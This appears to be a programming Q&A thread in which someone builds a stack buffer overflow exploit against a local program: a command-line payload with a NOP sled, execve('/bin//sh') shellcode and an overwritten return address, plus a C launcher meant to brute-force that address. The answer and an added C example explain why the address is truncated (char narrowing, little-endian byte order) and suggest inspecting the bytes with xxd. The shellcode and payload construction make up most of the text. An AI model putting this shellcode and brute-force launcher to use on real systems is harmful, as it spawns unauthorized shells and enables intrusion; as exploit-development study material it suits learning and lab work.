I have a vulnerable program exploitable through the cmdline:
./vuln $(perl -e 'print "\x90"x22'; cat shell; perl -e 'print "\x90"x22';perl -e 'print "\xf4\xdd\xff\xff\xff\x7f"')
����������������������H1��;H1�QH�/bin//shWH��@0����������������������������
$
Now I want to use a C program to be able to brute force the return address, but I'm having an issue while trying to fill the injected buffer (going through a strcpy that is vulnerable, so as to overwrite rip).
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int offset;

/* 28-byte execve("/bin//sh") shellcode; note the array has no room for a terminating NUL */
char shell[28] = {"\x48\x31\xc0\xb0\x3b\x48\x31\xc9\x51\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\x40\x30\xf6\x0f\x05"};

/* read the current stack pointer (relies on the GCC behaviour that rax holds the return value) */
unsigned long get_sp(void)
{
    __asm__("mov %rsp, %rax");
}

int main(int argc, char *argv[])
{
    int i;
    char buffer[78];
    unsigned long ret, rsp;

    offset = atoi(argv[1]);
    rsp = get_sp();
    ret = rsp + offset;
    printf("%lx\n", ret);

    for (i = 0; i < 78; i += 6)
        *(buffer + i) = ret; /* HERE THE PROBLEM: ret is narrowed to a single char */

    memset(buffer, '\x90', 22);                      /* NOP sled */
    strncpy(&buffer[22], shell, strlen(shell));      /* shellcode after the sled */
    execl("./vuln", "vuln", buffer, NULL);
}
Here is the output; as you may notice, the address is cut. Can you tell me why?
./exploit 52
7fffffffddf4
����������������������H1��;H1�QH�/bin//shWH��@0�
Using xxd to read what your program is outputting instead of shell substitution characters is a pretty good start. Remember that the address printed by %lx is interpreted as an ulong and correctly placed in memory by the compiler; the overwrite, on the other hand, must be correctly placed according to the endianness, which you are not doing. The implicit cast from ulong to char* is certainly not taking care of the endianness. But, for a start, you need a way to debug that, so read the output in something like xxd before trying to solve the problem.
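To make the answer's two points concrete, here is an added illustration (not code from the question or the answer) that takes the address the question printed, 0x7fffffffddf4, as an assumed input: it shows the single byte a char assignment keeps, the little-endian layout the compiler gives the same unsigned long in memory, and an xxd-style dump of those bytes so the buffer can be inspected rather than guessed at.

```c
#include <stdio.h>
#include <stdint.h>
#include <string.h>

/* What the question's loop actually stores: assigning an unsigned long to a
 * char keeps only the low-order byte of the value (modular truncation on GCC/Clang). */
unsigned char narrowed_byte(unsigned long v)
{
    char c = v;                 /* implicit narrowing conversion, as in *(buffer+i) = ret */
    return (unsigned char)c;
}

/* How the same unsigned long is laid out in memory on x86-64: least
 * significant byte first (little-endian), eight bytes in total. */
void store_le64(unsigned char *dst, uint64_t v)
{
    for (int i = 0; i < 8; i++)
        dst[i] = (unsigned char)(v >> (8 * i));
}

/* Render bytes as "f4 dd ff ff ff 7f 00 00", the way xxd would show them.
 * Returns the number of characters written (excluding the NUL). */
size_t hexdump_line(const unsigned char *p, size_t n, char *out, size_t outsz)
{
    size_t used = 0;
    for (size_t i = 0; i < n && used + 3 < outsz; i++)
        used += (size_t)snprintf(out + used, outsz - used, i ? " %02x" : "%02x", p[i]);
    return used;
}

int main(void)
{
    unsigned long ret = 0x7fffffffddf4UL;   /* constructed: the address the question printed */
    unsigned char buf[8];
    char line[64];

    printf("value printed with %%lx    : %lx\n", ret);
    printf("byte stored by char = ret  : %02x\n", narrowed_byte(ret));
    store_le64(buf, ret);
    hexdump_line(buf, sizeof buf, line, sizeof line);
    printf("bytes in memory (LE)       : %s\n", line);
    return 0;
}
```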